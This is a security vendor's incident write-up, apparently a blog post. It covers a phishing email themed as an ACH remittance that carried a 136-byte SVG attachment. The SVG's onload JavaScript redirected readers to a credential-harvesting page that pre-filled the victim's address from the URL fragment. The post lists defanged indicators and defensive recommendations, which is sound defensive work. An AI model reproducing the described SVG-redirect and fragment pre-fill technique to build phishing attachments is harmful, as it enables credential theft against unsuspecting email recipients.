136 Bytes Was All It Took: An SVG Attachment That Bypassed Every Scanner

The entire phishing payload fit inside 136 bytes.

No macro. No exploit kit. No multi-stage dropper. Just a single SVG file smaller than this paragraph, carrying a JavaScript onload event that hijacked the browser the instant a recipient opened it. The attachment passed antivirus scanning with a clean verdict, and the email cleared Microsoft's spam filters with an SCL score of 1. The target: an employee at a mid-size insurance claims adjustment firm, lured by a fake ACH remittance notification referencing a fabricated payment from a fictitious vendor.

A Remittance Email With Nothing Inside

The subject line was built for urgency: an approved ACH payment, a vendor name, a reference number, and the phrase "EFT Details." Everything a finance team employee would expect from a legitimate remittance notification. But the email body told a different story.

There were no payment amounts. No routing numbers. No invoice references. The visible content was limited to a legal disclaimer block and an email security scanning notice. That disconnect between what the subject promised and what the body delivered is a reliable indicator of a payload-dependent attack. The attacker needed the recipient to open the attachment to trigger the kill chain.

The Verizon DBIR 2024 found that pretexting, including financial transaction lures, was involved in 40% of social engineering incidents. ACH and wire transfer themes remain among the most effective pretexts because they create time pressure and financial anxiety simultaneously.

The Smallest Weapon in the Inbox

The attached file was an SVG with no filename beyond the .svg extension. At 136 bytes, it contained exactly one functional element: an onload attribute executing a window.location redirect. The moment a mail client or browser rendered the SVG, the recipient's session was silently redirected to an external credential harvesting page.

This technique exploits a fundamental blind spot. Most email security gateways treat SVG files as static image assets. Signature-based scanners look for known malicious patterns, embedded executables, or suspicious macro code. A 136-byte file with a single JavaScript line contains none of those signatures. The antivirus engine returned a clean verdict. The behavioral reality was anything but.

The redirect target was hosted on cic-news[.]ca, a domain with no SPF record, no DMARC policy, and no DNSSEC. The WHOIS record showed lightweight, individual-style registration consistent with disposable phishing infrastructure. The domain resolved to 104[.]198[.]174[.]130 and returned HTTP 200 at the time of analysis, confirming it was live and ready to receive redirected traffic.

See Your Risk: Calculate how many threats your SEG is missing

Fragment Identifier as Pre-Fill Token

The redirect URL included a fragment identifier containing the target's email address:

`` hxxps://cic-news[.]ca/dontcare/#@[.]com ``

This is a deliberate design choice. URL fragments are processed exclusively on the client side. They never appear in server logs or network-level inspection tools, making them invisible to proxy-based URL scanners. JavaScript on the landing page reads the fragment, extracts the email address, and pre-fills the credential harvesting form. The victim sees their own email address already populated, which increases the perceived legitimacy of the page and the likelihood they will enter their password.

The FBI IC3 2024 report documented over $2.9 billion in BEC losses, with payment diversion and credential theft remaining the top objectives. Techniques like fragment-based personalization represent the ongoing sophistication of phishing infrastructure, moving well beyond mass-blast campaigns toward individually tailored credential harvesting.

A Relay Path That Should Have Been a Red Flag

The email originated from IP 178[.]211[.]155[.]35, which reverse-resolves to a DeltaHost pointer record and geolocates to Frankfurt, Germany. DeltaHost is a web hosting provider, not an email security gateway. The Message-ID referenced @localhost, and the Return-Path was empty, both strong indicators of script-based injection from a compromised or rented server.

Authentication results confirmed the problem:

• SPF: Fail (the sending IP is not authorized for the claimed domain)
• DKIM: None (no signature present)
• DMARC: None (no policy published)

Despite this triple authentication failure, the message was delivered to the inbox. The Microsoft Digital Defense Report 2024 emphasized that authentication alone is insufficient without enforcement. When DMARC policies are set to none or absent entirely, failed SPF and missing DKIM become informational signals rather than blocking criteria. Attackers know this. They specifically target organizations and domains where DMARC enforcement is not configured, because it guarantees delivery despite authentication failures.

IRONSCALES flagged the message through behavioral analysis. While static scanners cleared the attachment and the email contained no embedded URLs to evaluate, the platform's analysis of the SVG payload identified the onload redirect behavior. Community-based reputation signals also contributed, matching patterns from previously reported phishing campaigns with similar structural characteristics. The combination of behavioral detection and community intelligence compensated for what authentication and signature-based scanning missed.

The Attack Chain, Step by Step

SVG Redirect IOCs

What Your Team Should Do This Week

1. Block SVG attachments at the gateway. If your organization has no legitimate business need for inbound SVG files, block them. Most email security platforms allow attachment-type filtering. This single rule would have prevented this entire attack chain.

1. Enforce DMARC with reject or quarantine. A triple authentication failure (SPF fail, no DKIM, no DMARC) should never result in inbox delivery. Audit your domain's DMARC policy and your inbound DMARC enforcement posture. CISA's phishing guidance recommends reject-level DMARC as a baseline control.

1. Layer behavioral analysis on attachment scanning. Static AV missed this because the payload was a legal JavaScript call, not a known malicious signature. Behavioral analysis that evaluates what an attachment does when rendered (rather than what it contains statically) is the detection layer that catches advanced attachment-based threats like this one.

1. Train finance teams on content mismatch. When a subject line promises payment details and the body contains only a disclaimer, something is wrong. That instinct needs to be muscle memory for anyone handling financial communications.